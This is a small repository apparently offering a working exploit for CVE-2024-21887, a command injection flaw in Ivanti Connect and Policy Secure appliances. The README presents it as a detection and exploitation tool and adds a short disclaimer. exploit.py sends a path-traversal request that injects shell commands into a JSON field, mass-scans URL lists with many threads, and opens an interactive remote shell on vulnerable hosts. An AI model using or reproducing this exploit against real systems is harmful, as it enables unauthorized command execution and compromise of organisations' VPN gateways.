├── requirements.txt ├── README.md └── exploit.py /requirements.txt: -------------------------------------------------------------------------------- 1 | alive_progress==3.1.4 2 | prompt_toolkit==3.0.36 3 | requests==2.25.1 4 | rich==13.7.0 5 | urllib3==1.26.12 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 🚨 CVE-2024-21887 Exploit Tool 🛠️ 2 | 3 | A robust tool for detecting and exploiting the CVE-2024-21887 vulnerability in Ivanti Connect and Policy Secure systems. 4 | 5 | ## 📝 Description 6 | 7 | CVE-2024-21887 is a critical command injection vulnerability, allowing authenticated admins to execute arbitrary commands. This tool aids in identifying and interacting with affected systems. 8 | 9 | ## 🚀 Features 10 | 11 | - **Single URL Scan**: Pinpoint focus on a single target. 12 | - **Bulk Scanning**: Analyze multiple URLs from a file. 13 | - **Thread Control**: Customize concurrent scanning with thread options. 14 | - **Output Logging**: Save identified vulnerable URLs to a file. 15 | 16 | ## 📚 How to Use 17 | 18 | 1. Install dependencies: `pip install -r requirements.txt` 19 | 2. Run the tool: 20 | - Single URL: `python exploit.py -u ` 21 | - Bulk scan: `python exploit.py -f ` 22 | - With threads: `python exploit.py -f -t ` 23 | - Save output: `python exploit.py -f -o ` 24 | 25 | ⚠️ **Disclaimer**: This tool is provided for educational and ethical testing purposes only. I am not responsible for any misuse or damage caused by this tool. Always obtain explicit permission before testing systems that you do not own or have explicit authorization to test. 26 | -------------------------------------------------------------------------------- /exploit.py: -------------------------------------------------------------------------------- 1 | import json 2 | import urllib3 3 | import requests 4 | import argparse 5 | 6 | from rich.console import Console 7 | from alive_progress import alive_bar 8 | from prompt_toolkit import PromptSession, HTML 9 | from prompt_toolkit.history import InMemoryHistory 10 | from concurrent.futures import ThreadPoolExecutor, as_completed 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | class CVE_2024_21887: 16 | def __init__(self, base_url): 17 | self.base_url = base_url 18 | self.console = Console() 19 | self.session = requests.Session() 20 | self.session.trust_env = False 21 | 22 | def send_backup_code_request(self, type_value="id"): 23 | data = {"type": f";{type_value};"} 24 | url = f"{self.base_url}/api/v1/totp/user-backup-code/%2E%2E/%2E%2E/system/maintenance/archiving/cloud-server-test-connection" 25 | try: 26 | response = self.session.post(url, json=data, verify=False, timeout=10) 27 | if response.headers.get("Content-Type") == "application/json": 28 | try: 29 | response_json = response.json() 30 | if "error" in response_json: 31 | return response_json["error"] 32 | except json.JSONDecodeError: 33 | pass 34 | return None 35 | except requests.exceptions.RequestException as e: 36 | pass 37 | 38 | def check_vulnerability(self): 39 | error_message = self.send_backup_code_request() 40 | if error_message: 41 | self.console.print( 42 | f"[bold green][+] {self.base_url} is vulnerable - [/bold green][bold yellow]{error_message}[/bold yellow]" 43 | ) 44 | 45 | return error_message 46 | 47 | def interactive_shell(self): 48 | session = PromptSession(InMemoryHistory()) 49 | self.console.print( 50 | f"[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]" 51 | ) 52 | while True: 53 | try: 54 | cmd = session.prompt(HTML("# ")) 55 | match cmd.lower(): 56 | case "exit": 57 | break 58 | case "clear": 59 | self.console.clear() 60 | case _: 61 | response = self.send_backup_code_request(cmd) 62 | if response: 63 | self.console.print(response) 64 | except KeyboardInterrupt: 65 | break 66 | 67 | 68 | def process_url(url, output_file=None): 69 | scanner = CVE_2024_21887(url) 70 | if scanner.check_vulnerability(): 71 | if output_file: 72 | with open(output_file, "a") as outfile: 73 | outfile.write(url + "\n") 74 | return url 75 | return None 76 | 77 | 78 | def main(): 79 | parser = argparse.ArgumentParser( 80 | description="CVE-2024-21887 Exploit Script. This script is designed to detect and interact with systems vulnerable to CVE-2024-21887." 81 | ) 82 | parser.add_argument( 83 | "-u", 84 | "--url", 85 | help="Specify a single URL to scan. Use this mode for a focused scan on one target.", 86 | ) 87 | parser.add_argument( 88 | "-f", 89 | "--file", 90 | help="Specify a file path containing a list of URLs for bulk scanning. Each URL should be on a new line.", 91 | ) 92 | parser.add_argument( 93 | "-t", 94 | "--threads", 95 | type=int, 96 | default=100, 97 | help="Set the number of concurrent threads for bulk scanning. Default is 100.", 98 | ) 99 | parser.add_argument( 100 | "-o", 101 | "--output", 102 | help="Specify a file path to save the URLs that are found to be vulnerable. Results are appended to this file in real time.", 103 | ) 104 | 105 | args = parser.parse_args() 106 | 107 | match args: 108 | case args if args.url: 109 | scanner = CVE_2024_21887(args.url) 110 | if scanner.check_vulnerability(): 111 | scanner.interactive_shell() 112 | 113 | case args if args.file: 114 | with open(args.file) as file: 115 | urls = file.read().splitlines() 116 | with alive_bar(len(urls), enrich_print=False) as bar: 117 | with ThreadPoolExecutor(max_workers=args.threads) as executor: 118 | futures = [ 119 | executor.submit(process_url, url, args.output) 120 | for url in urls 121 | ] 122 | for future in as_completed(futures): 123 | future.result() 124 | bar() 125 | if args.output: 126 | print(f"Vulnerable URLs saved to {args.output}") 127 | 128 | case _: 129 | parser.print_help() 130 | 131 | 132 | if __name__ == "__main__": 133 | main() 134 | --------------------------------------------------------------------------------